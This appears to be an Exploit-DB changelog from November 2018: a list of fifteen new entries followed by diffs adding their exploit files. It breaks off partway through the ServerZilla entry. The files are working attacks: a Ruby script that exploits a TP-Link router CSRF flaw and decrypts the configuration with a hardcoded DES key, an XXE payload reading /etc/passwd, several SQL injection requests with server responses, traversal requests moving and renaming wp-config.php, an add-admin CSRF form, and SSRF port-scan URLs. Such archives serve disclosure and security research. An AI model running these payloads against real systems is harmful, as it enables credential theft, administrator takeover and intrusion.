DB: 2018-11-13

15 changes to exploits/shellcodes

HeidiSQL 9.5.0.5196 - Denial of Service (PoC)
CuteFTP 9.3.0.3 - Denial of Service (PoC)
Mongoose Web Server 6.9 - Denial of Service (PoC)
Data Center Audit 2.6.2 - 'username' SQL Injection
TufinOS 2.17 Build 1193 - XML External Entity Injection
Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal
Paroiciel 11.20 - 'tRecIdListe' SQL Injection
TP-Link Archer C50 Wireless Router 171227 - Cross-Site Request Forgery (Configuration File Disclosure)
The Don 1.0.1 - 'login' SQL Injection
Facturation System 1.0 - 'modid' SQL Injection
Easyndexer 1.0 - Cross-Site Request Forgery (Add Admin)
GPS Tracking System 2.12 - 'username' SQL Injection
ServerZilla 1.0 - 'email' SQL Injection
D-LINK Central WifiManager CWM-100 - Server-Side Request Forgery
Nominas 0.27 - 'username' SQL Injection

exploits/hardware/webapps/45811.rb

@@ -0,0 +1,72 @@
+# Exploit Title: TP-Link Archer C50 Wireless Router 171227 - Cross-Site Request Forgery (Configuration File Disclosure)
+# Date: 2018-11-07
+# Exploit Author: Wadeek
+# Vendor Homepage: https://www.tp-link.com/
+# Hardware Version: Archer C50 v3 00000001
+# Firmware Link: https://www.tp-link.com/download/Archer-C50_V3.html#Firmware
+# Firmware Version: <= Build 171227
+
+#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+url = "http://192.168.0.1:80/"
+#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+
+require('base64')
+require('openssl')
+require('mechanize')
+agent = Mechanize.new()
+# require HTTP Proxy (chunk error)
+agent.set_proxy("127.0.0.1", "8080")
+
+def scan(agent, url, path, query)
+begin
+	puts(path)
+	response = agent.post(url+path, query, {
+		"User-Agent" => "",
+		"Accept" => "*/*",
+		"Referer" => "http://192.168.0.1/mainFrame.htm",
+		"Content-Type" => "text/plain",
+		"Connection" => "keep-alive",
+		"Cookie" => ""
+	})
+rescue Exception => e
+	begin
+	puts(e.inspect())
+	#
+	body = e.page().body()
+	content = Base64.decode64(body.scan(/ZAP Error \[java\.io\.IOException\]\: Bad chunk size\: (.*)/).join())
+	puts(body.inspect())
+	cipher = OpenSSL::Cipher.new("des-ecb")
+	cipher.key = "478DA50BF9E3D2CF"
+	cipher.decrypt()
+	output = cipher.update(content)
+	#
+	file = File.open("conf.bin.raw", "wb")
+	file.write(output)
+	file.close()
+	rescue Exception => e
+		puts(e)
+	end
+	puts("")
+end
+end
+
+#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+payload = "\x5b\x49\x47\x44\x5f\x44\x45\x56\x5f\x49\x4e\x46\x4f\x23\x30"+
+"\x2c\x30\x2c\x30\x2c\x30\x2c\x30\x2c\x30\x23\x30\x2c\x30\x2c"+
+"\x30\x2c\x30\x2c\x30\x2c\x30\x5d\x30\x2c\x34\xd\xa\x6d\x6f\x64"+
+"\x65\x6c\x4e\x61\x6d\x65\xd\xa\x64\x65\x73\x63\x72\x69\x70\x74"+
+"\x69\x6f\x6e\xd\xa\x58\x5f\x54\x50\x5f\x69\x73\x46\x44\xd\xa\x58"+
+"\x5f\x54\x50\x5f\x50\x72\x6f\x64\x75\x63\x74\x56\x65\x72\x73\x69"+
+"\x6f\x6e\xd\xa\x5b\x45\x54\x48\x5f\x53\x57\x49\x54\x43\x48\x23\x30"+
+"\x2c\x30\x2c\x30\x2c\x30\x2c\x30\x2c\x30\x23\x30\x2c\x30\x2c\x30\x2c"+
+"\x30\x2c\x30\x2c\x30\x5d\x31\x2c\x31\xd\xa\x6e\x75\x6d\x62\x65\x72"+
+"\x4f\x66\x56\x69\x72\x74\x75\x61\x6c\x50\x6f\x72\x74\x73\xd\xa\x5b"+
+"\x53\x59\x53\x5f\x4d\x4f\x44\x45\x23\x30\x2c\x30\x2c\x30\x2c\x30\x2c"+
+"\x30\x2c\x30\x23\x30\x2c\x30\x2c\x30\x2c\x30\x2c\x30\x2c\x30\x5d\x32"+
+"\x2c\x31\xd\xa\x6d\x6f\x64\x65\xd\xa\x5b\x2f\x63\x67\x69\x2f\x63\x6f"+
+"\x6e\x66\x65\x6e\x63\x6f\x64\x65\x23\x30\x2c\x30\x2c\x30\x2c\x30"+
+"\x2c\x30\x2c\x30\x23\x30\x2c\x30\x2c\x30\x2c\x30\x2c\x30\x2c\x30"+
+"\x5d\x33\x2c\x30\xd\xa\x3d"
+#puts(payload)
+scan(agent, url, "cgi?1&1&1&8", payload)
+#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

exploits/hardware/webapps/45818.txt

@@ -0,0 +1,28 @@
+# Exploit Title: D-LINK Central WifiManager CWM-100 - Server-Side Request Forgery
+# Author: John Page (aka hyp3rlinx)
+# Date: 2018-11-09
+# Vendor: http://us.dlink.com
+# Product Link: http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/
+# Version: Version 1.03 r0098
+# CVE: N/A
+# References:
+
+# [Security Issue]
+# Using a web browser or script SSRF can be initiated against internal/external systems 
+# to conduct port scans by leveraging D-LINKs MailConnect component.
+
+# The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended 
+# to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, 
+# leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI.
+# This can undermine accountability of where scan or connections actually came from and or bypass 
+# the FW etc. This can be automated via script or using Web Browser.
+
+# [Exploit/POC]
+https://VICTIM-IP/index.php/System/MailConnect/host/port/secure/
+
+reply: OK
+
+#Scan internal port 22 SSH:
+
+https://VICTIM-IP/index.php/System/MailConnect/host/VICTIM-IP/port/22/secure/
+reply: OK

exploits/linux/webapps/45808.txt

@@ -0,0 +1,47 @@
+# Exploit Title: TufinOS 2.17 Build 1193 - XML External Entity Injection
+# Exploit Author: konstantinos Alexiou
+# Date: 2018-10-18
+# Vendor: https://www.tufin.com
+# Software Link: https://www.tufin.com/tufin-orchestration-suite/securetrack
+# CVE: N/A
+# Category: webapps
+
+# 1. Description
+# The SecureTrack application is vulnerable to XML External Entity injection. 
+# This attack is considered quite serious and can be used to:
+# (1) Retrieve confidential data
+# (2) Perform denial of service
+# (3) Execute server side request forgery attacks
+# (4) Perform port scanning through the machine on other systems 
+
+# The issue was identified inside the "Audit" > "Best Practices" module of the "SecureTrack" 
+# application when creating a new Best Practices query and manipulating the "xml" parameter 
+# in the request. When the vulnerability is triggered it doesn't directly return anything 
+# to the attacker but rather the contents of the requested file are written inside 
+# the name field of a best practices. This vulnerability affects every "SecureTrack" 
+# application authentication user role.
+   
+# 2. Proof of Concept
+# Step 1: Login to the "SecureTrack" application using any user and then navigate to 
+# "Audit" > "Best Practices". 
+# Step 2: Create and submit a "New Query" while intercepting the traffic:
+# Step 3: Send the request to repeater and change it to include the following 
+# payload after the "xml=" input field:
+-->
+
+<!DOCTYPE foo [<!ENTITY AAAA SYSTEM "file:///etc/passwd"> ]>
+
+<!--
+
+# The payload should be URL encoded before delivered to the application
+
+# Step 4: Submit the request to the server.
+
+# Step 5: Refresh your browser to view the new Best Practice that was created. The following image 
+# displays that the request was successfully processed by the server and a new Best Practice was 
+# created. The contents of the requested file "/etc/passwd" is saved as the name of the "Best Practice query". 
+
+# 3. Solution:
+# Reconfigure the XML processor to use a local static DTD and disallow any declared DTD included in 
+# the XML document. Another solution is to explicitly disable External XML Entities in the parser of 
+# the application.

exploits/php/webapps/45807.txt

@@ -0,0 +1,33 @@
+# Exploit Title: Data Center Audit 2.6.2 - 'username' SQL Injection
+# Dork: N/A
+# Date: 2018-11-09
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://sourceforge.net/projects/datacenteraudit/
+# Software Link: https://netix.dl.sourceforge.net/project/datacenteraudit/data_center_audit_v262.zip
+# Version: 2.6.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/dca_login.php
+# 
+POST /[PATH]/dca_login.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 288
+username=112'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&pass=1&submit=Login
+HTTP/1.1 200 OK
+Date: Fri, 09 Nov 2018 12:53:07 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Content-Length: 422
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8

exploits/php/webapps/45809.txt

@@ -0,0 +1,85 @@
+# Exploit Title: Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal
+# Date: 2018-05-11
+# Exploit Author: Pasquale Turi (aka boombyte)
+# Vendor Homepage: https://wordpress.org/plugins/media-file-manager/
+# Software Link: https://wordpress.org/plugins/media-file-manager/
+# Version: 1.4.2
+# CVE: N/A
+# Tested on: Ubuntu 18.10
+
+# Plugin description:
+# This plugin can be used for manage the uploaded file (we can rename files, see a preview, 
+# delete and move them to other folders under wordpress upload 	folder).
+# This plugin can be used by administrator, author, contributor and subscriber.
+
+# POC
+# Diretory trasversal:
+
+POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
+Accept: */*
+Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: REDATED
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 53
+Connection: close
+Cookie:	REDACTED
+
+action=mrelocator_getdir&dir=../../../../../../../etc
+
+# POC
+# XSS Reflected
+
+POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
+Accept: */*
+Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 68
+Connection: close
+Cookie: REDACTED
+
+action=mrelocator_getdir&dir=[XSS]
+
+# POC
+# Move any file to any dir:
+
+POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
+Accept: */*
+Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 75
+Connection: close
+Cookie: REDACTED
+
+action=mrelocator_move&dir_from=../../&dir_to=../../../&items=wp-config.php
+
+# POC
+# Rename any file:
+
+POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
+Accept: */*
+Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 97
+Connection: close
+Cookie:	REDACTED
+
+action=mrelocator_rename&dir=../../&from=wp-config.php&to=wp-config.txt

exploits/php/webapps/45810.txt

@@ -0,0 +1,91 @@
+# Exploit Title: Paroiciel 11.20 - 'tRecIdListe' SQL Injection
+# Dork: N/A
+# Date: 2018-11-09
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.paroiciel.com/
+# Software Link: https://datapacket.dl.sourceforge.net/project/paroiciel/version%2011/par6lus_11_20160225.exe
+# Version: 11.20
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/html/trec.php?tRecAction=P&tRecIdListe=[SQL]
+# 
+GET /[PATH]/html/trec.php?tRecAction=P&tRecIdListe=-1%27%20%20UNION%20SELECT%201,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),3,4,5,6,7,8,9,10,11--%20- HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:50.0) Gecko/20100101 Firefox/50.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: paroi6l_auth=euae0ldrb8q0rrnnc017etn9l3paroiciel11; PHPSESSID=euae0ldrb8q0rrnnc017etn9l3
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Date: Thu, 08 Nov 2018 23:39:52 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Vary: User-Agent
+Keep-Alive: timeout=5, max=89
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=utf-8
+
+# POC: 
+# 2)
+# http://localhost/[PATH]/html/zpro.php?zProAction=M&zProIdPro=[SQL]
+# 
+GET /[PATH]/html/zpro.php?zProAction=M&zProIdPro=%2d%32%27%20%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%31%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2d%2d%20%2d HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:50.0) Gecko/20100101 Firefox/50.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: paroi6l_auth=euae0ldrb8q0rrnnc017etn9l3paroiciel11; PHPSESSID=euae0ldrb8q0rrnnc017etn9l3
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Date: Thu, 08 Nov 2018 23:51:21 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Vary: User-Agent
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=utf-8
+
+# POC: 
+# 3)
+# http://localhost/[PATH]/html/egeq.php?eGeqActEquipe=M&eGeqIdEquipe=[SQL]
+# 
+GET /[PATH]/html/egeq.php?eGeqActEquipe=M&eGeqIdEquipe=%27%20%2f%2a%21%35%30%30%30%30%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%35%30%30%30%30%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%35%30%30%30%30%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:50.0) Gecko/20100101 Firefox/50.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: paroi6l_auth=euae0ldrb8q0rrnnc017etn9l3paroiciel11; PHPSESSID=euae0ldrb8q0rrnnc017etn9l3
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Date: Thu, 08 Nov 2018 23:59:17 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Vary: User-Agent
+Content-Length: 625
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=utf-8

exploits/php/webapps/45812.txt

@@ -0,0 +1,62 @@
+# Exploit Title: The Don 1.0.1 - 'login' SQL Injection
+# Dork: N/A
+# Date: 2018-11-11
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://thedon.sourceforge.io/
+# Software Link: https://netix.dl.sourceforge.net/project/thedon/thedon-1.0b.rar
+# Version: 1.0.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/index.php
+# 
+POST /[PATH]/index.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 596
+login=%2d%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%2c%32%39%2c%33%30%2c%33%31%2c%33%32%2c%33%33%2c%33%34%2c%33%35%2c%33%36%2c%33%37%2c%33%38%2c%33%39%2c%34%30%2c%34%31%2c%34%32%2c%34%33%2c%34%34%2c%34%35%2c%34%36%2c%34%37%2c%34%38%2c%34%39%2c%35%30%2c%35%31%2c%35%32%2c%35%33%2c%35%34%2c%35%35%2c%35%36%2c%35%37%2c%35%38%2c%35%39%2c%36%30%2d%2d%20%2d&pass=&submit=Efe
+HTTP/1.1 200 OK
+Date: Sat, 10 Nov 2018 21:29:43 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 3237
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC: 
+# 2)
+# http://localhost/[PATH]/parolapierduta.php
+# 
+POST /[PATH]/parolapierduta.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 590
+email=%2d%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%2c%32%39%2c%33%30%2c%33%31%2c%33%32%2c%33%33%2c%33%34%2c%33%35%2c%33%36%2c%33%37%2c%33%38%2c%33%39%2c%34%30%2c%34%31%2c%34%32%2c%34%33%2c%34%34%2c%34%35%2c%34%36%2c%34%37%2c%34%38%2c%34%39%2c%35%30%2c%35%31%2c%35%32%2c%35%33%2c%35%34%2c%35%35%2c%35%36%2c%35%37%2c%35%38%2c%35%39%2c%36%30%2d%2d%20%2d&submit=Efe
+HTTP/1.1 200 OK
+Date: Sat, 10 Nov 2018 21:31:02 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 3110
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8

exploits/php/webapps/45813.txt

@@ -0,0 +1,37 @@
+# Exploit Title: Facturation System 1.0 - 'modid' SQL Injection
+# Dork: N/A
+# Date: 2018-11-08
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://obedalvarado.pw/simple-invoice/
+# Software Link: https://kent.dl.sourceforge.net/project/simple-invoice/simple-invoice-master.zip
+# Version: 1.0 
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/ajax/editar_producto.php
+# 
+POST /[PATH]/ajax/editar_producto.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=aehrspv1bfhbp1iqhkl1107vd7
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 321
+mod_codigo=d&mod_id=12'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&mod_nombre=ds&mod_estado=1&mod_precio=2.00
+HTTP/1.1 200 OK
+Date: Thu, 08 Nov 2018 20:33:55 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 308
+Keep-Alive: timeout=5, max=94
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8

exploits/php/webapps/45815.txt

@@ -0,0 +1,86 @@
+# Exploit Title: Easyndexer 1.0 - Cross-Site Request Forgery (Add Admin)
+# Dork: N/A
+# Date: 2018-11-10
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://sourceforge.net/projects/easyndexer/
+# Software Link: https://ayera.dl.sourceforge.net/project/easyndexer/easyndexer_win32.exe
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/src/createuser.php
+# 
+POST /[PATH]/src/createuser.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 60
+username=efe&password=efe&name=OMer&surname=Efe&privileges=1
+HTTP/1.1 200 OK
+Date: Sat, 10 Nov 2018 17:12:54 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Set-Cookie: PHPSESSID=fuiv6a0p3jnu15ggcphj624e74; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 127
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC: 
+# 2)
+# http://localhost/[PATH]/src/createuser.php
+# 
+<html>
+<body>
+<tr>
+	<form action="http://localhost/ExploitDb/easyndexer/src/createuser.php" method="POST">
+		<td>New:</td>
+		<td><input name="username" type="text"></td>
+		<td><input name="password" type="text"></td>
+		<td><input name="name" type="text"></td>
+		<td><input name="surname" type="text"></td>
+		<td><select name="privileges">
+			<option value="1">Administrator</option>
+			<option value="2">Manager</option>
+			<option value="3">User</option>
+			<option value="4">Guest</option>
+			<option value="5">Translator</option>
+		</select></td>
+		<td><input value="Create" title="Creates a new user" type="submit"></td>
+		<td><input value="Reset" title="Reset data" type="reset"></td>
+	</form>
+</tr>
+</body>
+</html>
+
+# POC: Database File Download
+# 3)
+# http://localhost/[PATH]/databases/generaldb.db
+# 
+GET /[PATH]/databases/generaldb.db HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=fuiv6a0p3jnu15ggcphj624e74
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Sat, 10 Nov 2018 17:15:04 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+Last-Modified: Sat, 10 Nov 2018 17:12:54 GMT
+Etag: "1400-57a52941eade9"
+Accept-Ranges: bytes
+Content-Length: 5120
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive

exploits/php/webapps/45816.txt

@@ -0,0 +1,39 @@
+# Exploit Title: GPS Tracking System 2.12 - 'username' SQL Injection
+# Dork: N/A
+# Date: 2018-11-10
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://sourceforge.net/projects/gpstracking/
+# Software Link: https://kent.dl.sourceforge.net/project/gpstracking/gps.zip
+# Version: 2.12
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/monitoring/login.php
+# 
+POST /[PATH]/monitoring/login.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/[PATH]/monitoring/login.php
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 58
+username=%27or+1%3D1+or+%27%27%3D%27&password=&login=LOGIN
+HTTP/1.1 302 Found
+Date: Sat, 10 Nov 2018 11:45:59 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Set-Cookie: PHPSESSID=v7mujh7lua6d21q575eoletdt7; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Location: index.php
+Content-Length: 4095
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8

exploits/php/webapps/45817.txt

@@ -0,0 +1,33 @@
+# Exploit Title: ServerZilla 1.0 - 'email' SQL Injection
+# Dork: N/A
